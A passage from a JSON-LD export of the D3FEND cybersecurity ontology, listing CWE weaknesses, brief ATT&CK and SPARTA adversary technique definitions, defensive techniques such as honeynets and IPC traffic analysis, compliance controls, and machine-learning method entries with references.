      "d3f:kb-abstract": "There is a significant body of work devoted to testing, verifying, and certifying the correctness of optimizing compilers. The focus of such work is to determine if source code and optimized code have the same functional semantics. In this paper, we introduce the correctness-security gap, which arises when a compiler optimization preserves the functionality of but violates a security guarantee made by source code. We show with concrete code examples that several standard optimizations, which have been formally proved correct, inhabit this correctness-security gap. We analyze this gap and conclude that it arises due to techniques that model the state of the program but not the state of the underlying machine. We propose a broad research program whose goal is to identify, understand, and mitigate the impact of security errors introduced by compiler optimizations. Our proposal includes research in testing, program analysis, theorem proving, and the development of new, accurate machine models for reasoning about the impact of compiler optimizations on security.",
      "d3f:kb-author": "Vijay D'Silva, Mathias Payer, Dawn Song",
      "d3f:kb-organization": "Google Inc, Purdue University, UC Berkeley",
      "d3f:kb-reference-of": {
        "@id": "d3f:DeadCodeElimination"
      },
      "d3f:kb-reference-title": "The Correctness-Security Gap in Compiler Optimization",
      "rdfs:label": "Reference - Dead code elimination"
    },
    {
      "@id": "d3f:CWE-74",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-74",
      "d3f:definition": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:CWE-591",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-591",
      "d3f:definition": "The product stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors.",
      "rdfs:label": "Sensitive Data Storage in Improperly Locked Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-413"
      }
    },
    {
      "@id": "d3f:T1608.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.004",
      "d3f:definition": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).",
      "rdfs:label": "Drive-by Target",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:Reference-IntrusionDetectionUsingAHeartbeat_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180191752A1"
      },
      "d3f:kb-abstract": "A variety of techniques are disclosed for detection of advanced persistent threats and similar malware. In one aspect, the detection of certain network traffic at a gateway is used to trigger a query of an originating endpoint, which can use internal logs to identify a local process that is sourcing the network traffic. In another aspect, an endpoint is configured to periodically generate and transmit a secure heartbeat, so that an interruption of the heartbeat can be used to signal the possible presence of malware. In another aspect, other information such as local and global reputation information is used to provide context for more accurate malware detection.",
      "d3f:kb-author": "Kenneth D. Ray",
      "d3f:kb-mitre-analysis": "This patent describes a health monitor deployed on an endpoint that uses a heartbeat to periodically communicate status to a gateway's remote health monitor. The endpoint health monitor issues a heartbeat for satisfactory status of the endpoint using factors such as:\n\n* checking the status of individual software items executing on the endpoint\n* checking that antivirus and other security software is up to date (e. g., with current virus definition files) and running correctly\n* checking the integrity of cryptographic key stores\n* checking other hardware or software components of the endpoint as necessary or helpful for health monitoring\n\nA disappearance of the heartbeat from the endpoint may indicate that the endpoint has been compromised.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:EndpointHealthBeacon"
      },
      "d3f:kb-reference-title": "Intrusion detection using a heartbeat",
      "rdfs:label": "Reference - Intrusion detection using a heartbeat - Sophos Ltd"
    },
    {
      "@id": "d3f:member-of",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "member-of",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:WebResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Ephemeral digital artifact comprising a request of a network resource and any response from that network resource using a standard web protocol.",
      "rdfs:label": "Web Resource Access",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResourceAccess"
      }
    },
    {
      "@id": "d3f:NetworkInterfaceCard",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:NetworkCardFirmware"
      },
      "d3f:definition": "A network interface card (NIC, also known as a network interface controller, network adapter, LAN adapter or physical network interface, and by similar terms) is a computer hardware component that connects a computer to a computer network.",
      "d3f:synonym": "Network Interface Controller",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Network_interface_controller"
      },
      "rdfs:label": "Network Interface Card",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/network_interface"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Naf6237219485459aa3f596b10384ce29"
        }
      ]
    },
    {
      "@id": "_:Naf6237219485459aa3f596b10384ce29",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkCardFirmware"
      }
    },
    {
      "@id": "d3f:ContentSubstitution",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentSubstitution"
      ],
      "d3f:d3fend-id": "D3-CNS",
      "d3f:definition": "Modifies specific digital content information by replacing it with something else.",
      "d3f:kb-article": "## How it works\n\nIf malicious or unecessary elements is discovered within the content, or if a specific embedded portion does not comply with policy, it may be replaced with alternatives to ensure safety.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Substitution",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:CCI-001237_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated patch management tools to facilitate flaw remediation to organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001237"
    },
    {
      "@id": "d3f:HardLink",
      "@type": "owl:Class",
      "d3f:definition": "In computing, a hard link is a directory entry that associates a name with a file on a file system. All directory-based file systems must have at least one hard link giving the original name for each file. The term \"hard link\" is usually only used in file systems that allow more than one hard link for the same file. Multiple hard links -- that is, multiple directory entries to the same file -- are supported by POSIX-compliant and partially POSIX-compliant operating systems, such as Linux, Android, macOS, and also Windows NT4 and later Windows NT operating systems.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hard_link"
      },
      "rdfs:label": "Hard Link",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSystemLink"
      }
    },
    {
      "@id": "d3f:CWE-921",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-921",
      "d3f:definition": "The product stores sensitive information in a file system or device that does not have built-in access control.",
      "rdfs:label": "Storage of Sensitive Data in a Mechanism without Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-922"
      }
    },
    {
      "@id": "d3f:CCI-000776_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses organization-defined replay-resistant authentication mechanisms for network access to non-privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000776"
    },
    {
      "@id": "d3f:REC-0001.07",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.07",
      "d3f:definition": "Adversaries pursue a clear picture of payload type, operating modes, command set, and data paths to and from the bus and ground. High-value details include vendor and model, operating constraints (thermal, pointing, contamination), mode transition logic, timing of calibrations, safety inhibits and interlocks, firmware/software update paths, data formatting and compression, and any crypto posture differences between payload links and the main command link. Payload ICDs often reveal addresses, message identifiers, and gateway locations where payload traffic bridges to the C&DH or data-handling networks, creating potential pivot points. Knowledge of duty cycles and scheduler entries enables timing attacks that coincide with high-power or high-rate operations to stress power/thermal margins or saturate storage and downlink. Even partial information, calibration script names, test vectors, or engineering telemetry mnemonics, can shrink the search space for reverse engineering.",
      "rdfs:label": "Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/07/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Payload"
    },
    {
      "@id": "d3f:LinearRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LR",
      "d3f:definition": "Statistical regression method used for predictive analysis by modeling the linear relationship between independent and dependent variables.",
      "d3f:kb-article": "## How it works\nTakes independent variables (i.e. covariate, features, predictors, input variables) and dependent variables (i.e. response, output, “thing to be estimated”) and produces the coefficient(s) and intercept for a linear equation (e.g. (β1, β0) for y = β1x + β0) which predicts the relationship between the independent and independent variables by minimizing a cost function, Mean Squared Error, either directly in the case of univariate linear regression or by gradient descent* in the case of multivariate linear regression.\n\n## Considerations\n - There are four principal assumptions required for good results using linear regression (the first letters of the four principal assumptions form the \"LINE\" mnemonic):\n   - Linearity and Additivity\n   - Independent Residuals\n   - Normal Residual Distributions\n   - Equal Variances (i.e. homoscedasticity)\n - Linear regression is a low variance/high bias model.\n - Optimizers like Adam, Batch, and Mini-Batch and others are available for certain applications and data sets.\n- A large learning ratio or training coefficient may lead to divergent behavior of the model and too small of values may lead to long run times and inefficiency.\n\n\n## Verification Approach\n - Models are often evaluated by examining one or more of the metrics of R2, Root Mean Squared Error (RMSE), Mean Absolute Error (MAE), and Mean Absolute Percentage Error (MAPE).\n - While there is no generally accepted single best performance metric as a criterion, users of linear regression should consider the suitability of one or more of these metrics for assessing the performance of their model.\n - Use well known data sets to verify model execution.\n\n## Validation Approach\n - Violating the principal assumptions of linear regression results in poor or misleading results.\n - Ensure data is truly representative and if there are any known biases.\n\n\n## References\n1. Gawali, Suvarna. “Linear Regression Algorithm to Make Predictions Easily.” Analytics Vidhya, 22 July 2022, https://www.analyticsvidhya.com/blog/2021/06/linear-regression-in-machine-learning/.\n1. Nau, Robert. “Statistical Forecasting: Notes On Regression and Time Series Analysis.” Introduction to Linear Regression Analysis, Duke University Fuqua School of Business, 18 Aug. 2020, https://people.duke.edu/~rnau/regintro.htm.\n1. Ng, Ritchie. “Evaluating a Linear Regression Model.” Ritchieng.github.io, 8 Jan. 2023, https://www.ritchieng.com/machine-learning-evaluate-linear-regression-model/.\n1. Bochkarev, Alexei. \"A New Typology Design of Performance Metrics to Measure Errors in Machine Learning Regression Algorithms\", 2019, https://www.researchgate.net/publication/330661543_A_New_Typology_Design_of_Performance_Metrics_to_Measure_Errors_in_Machine_Learning_Regression_Algorithms.",
      "rdfs:label": "Linear Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:d3fend-general-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-general-object-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:CCI-002468_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs data origin verification authentication on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002468"
    },
    {
      "@id": "d3f:WindowsNtAllocateVirtualMemoryEx",
      "@type": "owl:Class",
      "rdfs:label": "Windows NtAllocateVirtualMemoryEx",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:BucketOfModels",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BOM",
      "d3f:definition": "A \"bucket of models\" is an ensemble technique in which a model selection algorithm is used to choose the best model for each problem. When tested with only one problem, a bucket of models can produce no better results than the best model in the set, but when evaluated across many problems, it will typically produce much better results, on average, than any model in the set.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Bucket of Models",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-581",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-581",
      "d3f:definition": "The product does not maintain equal hashcodes for equal objects.",
      "rdfs:label": "Object Model Violation: Just One of Equals and Hashcode Defined",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-697"
        }
      ]
    },
    {
      "@id": "d3f:OperatingSystemConfigurationComponent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An component of the overall information necessary for the configuration of an operating system.",
      "rdfs:label": "Operating System Configuration Component",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/03085025-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemConfiguration"
      },
      "skos:altLabel": [
        "Operating System Configuration Information",
        "System Configuration"
      ]
    },
    {
      "@id": "d3f:SupervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SL",
      "d3f:definition": "Supervised learning establishes a relationship between the known input and output variables to conduct a predictive analysis.",
      "d3f:kb-article": "## References\nSupervised learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Supervised_learning).",
      "rdfs:label": "Supervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:SourceCodeAnalyzerTool",
      "@type": "owl:Class",
      "d3f:definition": "A source code analyzer tool is a static analysis tool that operates specifically on source code, but not object code.",
      "rdfs:label": "Source Code Analyzer Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Static_program_analysis"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StaticAnalysisTool"
      }
    },
    {
      "@id": "d3f:OTDeleteControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a remote device to remove an existing control program.",
      "rdfs:label": "OT Delete Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:N7f182255cbd74d3bad3bdba0a13126bd"
        },
        {
          "@id": "_:N36c2dd5a8f7741f782e3a969da2e96e7"
        }
      ]
    },
    {
      "@id": "_:N7f182255cbd74d3bad3bdba0a13126bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:N36c2dd5a8f7741f782e3a969da2e96e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeleteControlProgramCommand"
      }
    },
    {
      "@id": "d3f:ImageSegment",
      "@type": "owl:Class",
      "d3f:definition": "Image segments are distinct partitions of an object file.  Both data and code segments are examples of image segments.",
      "rdfs:label": "Image Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ObjectFile"
        },
        {
          "@id": "dbr:Object_file"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:BinarySegment"
        },
        {
          "@id": "d3f:FileSection"
        }
      ]
    },
    {
      "@id": "d3f:IntegratedHoneynet",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IntegratedHoneynet"
      ],
      "d3f:d3fend-id": "D3-IHN",
      "d3f:definition": "The practice of setting decoys in a production environment to entice interaction from attackers.",
      "d3f:kb-article": "## How it works\nIntegrated honeynets use full production environments connected to the enterprise network, that utilize computing resources or software that attract attackers, and allow full interaction and access that provides a complete view of an attack.\n\n## Considerations\nAn attacker with control of a system on an Integrated Honeynet could:\n* try to attack other connected hosts on the network, its IP range of internal hosts not properly configured to react to connections from machines on the integrated honeynet, or position behind the firewall.\n* exploit its position by eavesdropping on network traffic\nIf an attacker manages to stop the processes used to log an attack without setting off any alarms. [1]\n\n1. Honeypots for Windows, Roger Grimes, 2005",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SynchronizingAHoneyNetworkConfigurationToReflectATargetNetworkEnvironment_PaloAltoNetworksInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:IntranetNetwork"
      },
      "rdfs:label": "Integrated Honeynet",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "_:N8b5db15d57e24de28fbeb59d2e7c3fba"
        }
      ]
    },
    {
      "@id": "_:N8b5db15d57e24de28fbeb59d2e7c3fba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetwork"
      }
    },
    {
      "@id": "d3f:CWE-277",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-277",
      "d3f:definition": "A product defines a set of insecure permissions that are inherited by objects that are created by the program.",
      "rdfs:label": "Insecure Inherited Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:RestoreDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreDatabase"
      ],
      "d3f:d3fend-id": "D3-RD",
      "d3f:definition": "Restoring the data in a database.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Restore Database",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:Nb0b40229d1d94ee98c9a6db64517b96b"
        }
      ]
    },
    {
      "@id": "_:Nb0b40229d1d94ee98c9a6db64517b96b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:T1055.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.008",
      "d3f:definition": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Ptrace System Calls",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Nbbeaa77199f34a7fa3b501b27d8241b5"
        }
      ]
    },
    {
      "@id": "_:Nbbeaa77199f34a7fa3b501b27d8241b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:BayesianHypothesisTesting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BHT",
      "d3f:definition": "Bayesian hypothesis testing can be framed as a special case of model comparison where a model refers to a likelihood function and a prior distribution.",
      "d3f:kb-article": "## How it works\nGiven two competing hypotheses and some relevant data, Bayesian hypothesis testing begins by specifying separate prior distributions to quantitatively describe each hypothesis. The combination of the likelihood function for the observed data with each of the prior distributions yields hypothesis-specific models. For each of the hypothesis-specific models, averaging (ie, integrating) the likelihood with respect to the prior distribution across the entire parameter space yields the probability of the data under the model and, therefore, the corresponding hypothesis. This quantity is more commonly referred to as the marginal likelihood and represents the average fit of the model to the data. The ratio of the marginal likelihoods for both hypothesis-specific models is known as the Bayes factor.\n\n## References\nBaig, S. A., PhD. (2020). Bayesian Inference: An Introduction to Hypothesis Testing Using Bayes Factors. Nicotine & Tobacco Research, 22(7), 1244-1246. [Link](https://academic.oup.com/ntr/article/22/7/1244/5613971)",
      "rdfs:label": "Bayesian Hypothesis Testing",
      "rdfs:subClassOf": {
        "@id": "d3f:BayesianMethod"
      }
    },
    {
      "@id": "d3f:IPCTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IPCTrafficAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IntranetIPCNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-IPCTA",
      "d3f:definition": "Analyzing standard inter process communication (IPC) protocols to detect deviations from normal protocol activity.",
      "d3f:kb-article": "## How it works\nInter process communication enables applications or threads to share data. This can involve one or more computers. Monitoring IPC in your environment can reveal abnormal or malicious activity.\nIPC can occur within a single computer or between multiple computers remotely through network protocols. Thus there are multiple ways to collect and monitor these exchanges between processes. A network protocol analyzer may monitor and parse SMB network traffic to record system activity. A host based monitoring agent may monitor IPC activity contained within a single host to look for deviations from standard usages.\n\n### Examples\n * SMB\n * Zeromq\n * Java RMI API\n\n## Considerations\n* IPC can generate substantial amounts of data, and it may not be feasible to collect all of it.\n* IPC may occur over loopback interfaces or direct memory access granted by the operating system.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-SMBCopyAndExecution_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBEventsMonitoring_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBSessionSetups_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBWriteRequest-NamedPipes_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBWriteRequest_MITRE"
        },
        {
          "@id": "d3f:Reference-SecuritySystemWithMethodologyForInterprocessCommunicationControl_CheckPointSoftwareTechInc"
        },
        {
          "@id": "d3f:Reference-CAR-2015-04-001%3ARemotelyScheduledTasksViaAT_MITRE"
        }
      ],
      "d3f:synonym": "IPC Analysis",
      "rdfs:label": "IPC Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N4b3f0be85b7748bd88d7111a77999018"
        }
      ]
    },
    {
      "@id": "_:N4b3f0be85b7748bd88d7111a77999018",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetIPCNetworkTraffic"
      }
    },
    {
      "@id": "d3f:employs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x employs y: The entity x makes purposeful use of entity y to perform a function.",
      "rdfs:label": "employs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:UnloadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call that unloads a driver or extension from the kernel.",
      "d3f:unloads": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "d3f:KernelModule"
        }
      ],
      "rdfs:label": "Unload Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ne9e73cd078da49b59e2aea84bc8c74a7"
        },
        {
          "@id": "_:Nef6354bcef9341858ceac97598a1999e"
        }
      ]
    },
    {
      "@id": "_:Ne9e73cd078da49b59e2aea84bc8c74a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:unloads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "_:Nef6354bcef9341858ceac97598a1999e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:unloads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "d3f:EventLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DigitalEventRecord"
      },
      "d3f:definition": "Event logs record events taking place in the execution of a system in order to provide an audit trail that can be used to understand the activity of the system and to diagnose problems. They are essential to understand the activities of complex systems, particularly in the case of applications with little user interaction (such as server applications).",
      "d3f:synonym": "Digital Event Log",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Log_file#Event_logs"
      },
      "rdfs:label": "Event Log",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Log"
        },
        {
          "@id": "_:N00528a3c02594abf9f748951fdb3efd5"
        }
      ]
    },
    {
      "@id": "_:N00528a3c02594abf9f748951fdb3efd5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalEventRecord"
      }
    },
    {
      "@id": "d3f:KernelAPISensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Monitors system calls (operating system api functions).",
      "d3f:monitors": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "Kernel API Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N1959f76a8dcb4335bdaa0bc345d3ac9f"
        }
      ]
    },
    {
      "@id": "_:N1959f76a8dcb4335bdaa0bc345d3ac9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-1272",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1272",
      "d3f:definition": "The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions.",
      "rdfs:label": "Sensitive Information Uncleared Before Debug/Power State Transition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-4_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Nonlocal Maintenance | Logging and Review",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "rdfs:label": "MA-4(1)"
    },
    {
      "@id": "d3f:T1074",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1074",
      "d3f:definition": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)",
      "d3f:reads": {
        "@id": "d3f:Resource"
      },
      "rdfs:label": "Data Staged",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N25a12e95ba804951ade1f2dded22c618"
        }
      ]
    },
    {
      "@id": "_:N25a12e95ba804951ade1f2dded22c618",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:OfficeApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An office application is one that is part of an application suite (e.g., Microsoft Office, Open Office).",
      "rdfs:label": "Office Application",
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:T1027.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.010",
      "d3f:definition": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)",
      "rdfs:label": "Command Obfuscation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:CCI-002355_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces access control decisions based on organization-defined security attributes that do not include the identity of the user or process acting on behalf of the user.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
